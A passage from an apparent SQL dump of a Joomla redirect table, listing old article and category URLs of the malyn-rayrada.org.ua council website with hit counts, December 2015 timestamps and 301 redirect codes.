00:00:00',301),(20394,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=844:------------2013--&Itemid=70&lang=en&option=com_content&view=article','','','',5,0,'2015-12-11 01:29:30','0000-00-00 00:00:00',301),(20395,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:29:32','0000-00-00 00:00:00',301),(20396,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1138:-15112013&Itemid=18&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 01:29:36','0000-00-00 00:00:00',301),(20397,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:29:41','0000-00-00 00:00:00',301),(20398,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1043:-------2013-&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:29:47','0000-00-00 00:00:00',301),(20399,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=815:-16-6-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:29:51','0000-00-00 00:00:00',301),(20400,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1010:-22-6-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:29:54','0000-00-00 00:00:00',301),(20401,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1316:2014-05-20-12-49-29&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 01:29:56','0000-00-00 00:00:00',301),(20402,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=544:2012-01-26-12-03-44&Itemid=76&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:30:05','0000-00-00 00:00:00',301),(20403,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=780:2012-10-04-07-48-30&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:10','0000-00-00 00:00:00',301),(20404,'http://www.malyn-rayrada.org.ua/index.php?id=56:--03022014-&Itemid=97&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 01:30:15','0000-00-00 00:00:00',301),(20405,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=437:-----l-r--2012-2015-&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:22','0000-00-00 00:00:00',301),(20406,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=651:-2012-&Itemid=80&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 01:30:27','0000-00-00 00:00:00',301),(20407,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=698:-6-16112010-5-&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:29','0000-00-00 00:00:00',301),(20408,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=844:------------2013--&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:30:31','0000-00-00 00:00:00',301),(20409,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=331:2011-05-20-16-30-09&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:38','0000-00-00 00:00:00',301),(20410,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1084:-qq&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:42','0000-00-00 00:00:00',301),(20411,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1195:2014-01-28-13-01-27&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:45','0000-00-00 00:00:00',301),(20412,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:47','0000-00-00 00:00:00',301),(20413,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1144:-lr&Itemid=95&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:30:53','0000-00-00 00:00:00',301),(20414,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=713:2012-06-14-15-13-57&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:00','0000-00-00 00:00:00',301),(20415,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=985:2013-04-12-09-53-08&Itemid=88&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:31:02','0000-00-00 00:00:00',301),(20416,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:16','0000-00-00 00:00:00',301),(20417,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1070:2013-08-23-04-27-00&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:18','0000-00-00 00:00:00',301),(20418,'http://www.malyn-rayrada.org.ua/index.php?catid=30:--30122010-&id=229:-2011-&Itemid=61&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:20','0000-00-00 00:00:00',301),(20419,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=784:-9-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:25','0000-00-00 00:00:00',301),(20420,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=701:-2011-2017-&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:27','0000-00-00 00:00:00',301),(20421,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1092:2013-09-19-12-18-37&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:36','0000-00-00 00:00:00',301),(20422,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:38','0000-00-00 00:00:00',301),(20423,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1166:2014-01-06-08-21-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:40','0000-00-00 00:00:00',301),(20424,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:42','0000-00-00 00:00:00',301),(20425,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=948:-2012-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:49','0000-00-00 00:00:00',301),(20426,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1049:2013-07-15-05-50-46&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:52','0000-00-00 00:00:00',301),(20427,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:54','0000-00-00 00:00:00',301),(20428,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=918:-2013-2015-&Itemid=86&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:31:56','0000-00-00 00:00:00',301),(20429,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=326:2011-05-20-16-17-28&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:31:58','0000-00-00 00:00:00',301),(20430,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:00','0000-00-00 00:00:00',301),(20431,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:02','0000-00-00 00:00:00',301),(20432,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=430:14-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:05','0000-00-00 00:00:00',301),(20433,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:07','0000-00-00 00:00:00',301),(20434,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=646:2012-04-08-07-58-55&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:09','0000-00-00 00:00:00',301),(20435,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=311:-v-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:11','0000-00-00 00:00:00',301),(20436,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1199:---------------l-r---&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:23','0000-00-00 00:00:00',301),(20437,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=940:2013-02-21-14-02-14&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:41','0000-00-00 00:00:00',301),(20438,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1061:2013-07-29-08-58-16&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:45','0000-00-00 00:00:00',301),(20439,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1052:2013-07-19-11-32-33&Itemid=92&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:32:49','0000-00-00 00:00:00',301),(20440,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1172:2014-01-14-14-46-07&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:53','0000-00-00 00:00:00',301),(20441,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=775:2012-10-02-09-35-53&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:32:57','0000-00-00 00:00:00',301),(20442,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=409:-2011-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:02','0000-00-00 00:00:00',301),(20443,'http://www.malyn-rayrada.org.ua/index.php?catid=2&id=7:2010-06-05-14-44-23&Itemid=5&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:04','0000-00-00 00:00:00',301),(20444,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=882:2012-12-21-17-08-23&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:06','0000-00-00 00:00:00',301),(20445,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=195:------------2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:15','0000-00-00 00:00:00',301),(20446,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=218:2010-12-21-06-45-54&Itemid=16&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:33:21','0000-00-00 00:00:00',301),(20447,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=693:2012-06-06-14-15-01&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 01:33:41','0000-00-00 00:00:00',301),(20448,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=851:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:43','0000-00-00 00:00:00',301),(20449,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=605:-l-r-i-iii-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:45','0000-00-00 00:00:00',301),(20450,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=486:-l-28r&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:33:47','0000-00-00 00:00:00',301),(20451,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1145:2013-11-27-09-47-11&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:33:59','0000-00-00 00:00:00',301),(20452,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=948:--------------2012-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:01','0000-00-00 00:00:00',301),(20453,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=677:------------2012-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:03','0000-00-00 00:00:00',301),(20454,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:05','0000-00-00 00:00:00',301),(20455,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1119:2013-10-25-12-26-37&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:12','0000-00-00 00:00:00',301),(20456,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=912:2013-01-22-14-14-06&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:14','0000-00-00 00:00:00',301),(20457,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:27','0000-00-00 00:00:00',301),(20458,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=407:----------l---r--2010-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:29','0000-00-00 00:00:00',301),(20459,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1049:2013-07-15-05-50-46&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:31','0000-00-00 00:00:00',301),(20460,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=408:-2011-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:39','0000-00-00 00:00:00',301),(20461,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=521:-2012-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:44','0000-00-00 00:00:00',301),(20462,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=949:2013-03-06-12-51-36&Itemid=88&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:46','0000-00-00 00:00:00',301),(20463,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=644:2012-04-04-09-52-48&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:48','0000-00-00 00:00:00',301),(20464,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=274:2011-03-28-08-22-32&Itemid=62&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:34:50','0000-00-00 00:00:00',301),(20465,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=430:14-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:35:03','0000-00-00 00:00:00',301),(20466,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=548:-2011-2015-&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:35:05','0000-00-00 00:00:00',301),(20467,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:35:09','0000-00-00 00:00:00',301),(20468,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=31&lang=en&option=com_rd_sitemap&view=sitemap','','','',2,0,'2015-12-11 01:35:12','0000-00-00 00:00:00',301),(20469,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 01:35:18','0000-00-00 00:00:00',301),(20470,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:35:20','0000-00-00 00:00:00',301),(20471,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:35:24','0000-00-00 00:00:00',301),(20472,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1084:-qq&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:35:33','0000-00-00 00:00:00',301),(20473,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1327:2014-06-01-11-51-13&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 01:35:35','0000-00-00 00:00:00',301),(20474,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1051:--------4------&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:35:41','0000-00-00 00:00:00',301),(20475,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=944:-l-r-&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:35:54','0000-00-00 00:00:00',301),(20476,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1147:2013-11-28-09-57-12&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:03','0000-00-00 00:00:00',301),(20477,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=617:-----l---28r-----&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:06','0000-00-00 00:00:00',301),(20478,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1199:---------------l-r---&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:10','0000-00-00 00:00:00',301),(20479,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=800:-l-r&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:13','0000-00-00 00:00:00',301),(20480,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=593:-lr&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:15','0000-00-00 00:00:00',301),(20481,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:36:24','0000-00-00 00:00:00',301),(20482,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=964:-2013-2017-&Itemid=88&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:36:26','0000-00-00 00:00:00',301),(20483,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=766:2012-09-28-08-37-31&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:40','0000-00-00 00:00:00',301),(20484,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=592:2012-02-27-15-06-10&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:42','0000-00-00 00:00:00',301),(20485,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=719:-lr&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:49','0000-00-00 00:00:00',301),(20486,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=962:-2017-&Itemid=88&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:36:51','0000-00-00 00:00:00',301),(20487,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1000:1&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:36:53','0000-00-00 00:00:00',301),(20488,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:36:56','0000-00-00 00:00:00',301),(20489,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1333:2014-06-05-13-09-03&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:07','0000-00-00 00:00:00',301),(20490,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:14','0000-00-00 00:00:00',301),(20491,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:16','0000-00-00 00:00:00',301),(20492,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1151:2013-11-28-14-54-33&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:21','0000-00-00 00:00:00',301),(20493,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=965:2013-03-14-10-56-03&lang=uk&option=com_content&view=article','','','',5,0,'2015-12-11 01:37:28','0000-00-00 00:00:00',301),(20494,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1110:-9-2013-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:32','0000-00-00 00:00:00',301),(20495,'http://www.malyn-rayrada.org.ua/index.php?id=52:--16082013-&Itemid=93&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-11 01:37:34','0000-00-00 00:00:00',301),(20496,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=747:2012-08-03-09-21-28&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:37','0000-00-00 00:00:00',301),(20497,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=479:2011-11-28-07-33-14&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:43','0000-00-00 00:00:00',301),(20498,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1317:2014-05-25-18-25-09&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 01:37:46','0000-00-00 00:00:00',301),(20499,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=343:-2011-&Itemid=68&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:50','0000-00-00 00:00:00',301),(20500,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=84&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 01:37:52','0000-00-00 00:00:00',301),(20501,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=201:--------l-r--2011--&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:37:55','0000-00-00 00:00:00',301),(20502,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:37:57','0000-00-00 00:00:00',301),(20503,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=693:2012-06-06-14-15-01&lang=ru&option=com_content&view=article','','','',6,0,'2015-12-11 01:38:00','0000-00-00 00:00:00',301),(20504,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1161:2013-12-18-13-34-32&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:02','0000-00-00 00:00:00',301),(20505,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1071:2013-08-27-14-06-18&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:04','0000-00-00 00:00:00',301),(20506,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:11','0000-00-00 00:00:00',301),(20507,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:16','0000-00-00 00:00:00',301),(20508,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=884:2012-12-24-10-46-13&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 01:38:21','0000-00-00 00:00:00',301),(20509,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1332:2014-06-04-09-44-02&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 01:38:25','0000-00-00 00:00:00',301),(20510,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1143:2013-11-26-13-23-37&Itemid=95&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:38:27','0000-00-00 00:00:00',301),(20511,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=958:-2010-2015-&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:34','0000-00-00 00:00:00',301),(20512,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=742:-14-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:37','0000-00-00 00:00:00',301),(20513,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=987:2013-04-15-06-06-41&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:44','0000-00-00 00:00:00',301),(20514,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 01:38:47','0000-00-00 00:00:00',301),(20515,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 01:39:07','0000-00-00 00:00:00',301),(20516,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=583:-l-lr&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:39:10','0000-00-00 00:00:00',301),(20517,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=309:----5----6--20--2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 01:39:16','0000-00-00 00:00:00',301),(20518,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:39:18','0000-00-00 00:00:00',301),(20519,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=412:------165------&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 01:39:45','0000-00-00 00:00:00',301),(20520,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=879:2012-12-21-17-02-01&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:40:16','0000-00-00 00:00:00',301),(20521,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1303:2014-04-29-13-13-18&Itemid=17&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 01:40:18','0000-00-00 00:00:00',301),(20522,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1193:-2014-2015-&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:40:21','0000-00-00 00:00:00',301),(20523,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1127:2013-11-05-12-58-04&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:40:53','0000-00-00 00:00:00',301),(20524,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=211:2010-12-15-14-46-24&Itemid=60&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:40:56','0000-00-00 00:00:00',301),(20525,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1030:2013-06-17-06-46-59&Itemid=92&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 01:41:00','0000-00-00 00:00:00',301),(20526,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1008:2013-05-20-07-02-57&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:41:02','0000-00-00 00:00:00',301),(20527,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:41:05','0000-00-00 00:00:00',301),(20528,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=748:2012-08-12-17-56-55&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:41:07','0000-00-00 00:00:00',301),(20529,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=693:2012-06-06-14-15-01&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:41:09','0000-00-00 00:00:00',301),(20530,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 01:41:14','0000-00-00 00:00:00',301),(20531,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1069:23--------&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 01:41:16','0000-00-00 00:00:00',301),(20532,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=330:2011-05-20-16-28-08&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 01:41:18','0000-00-00 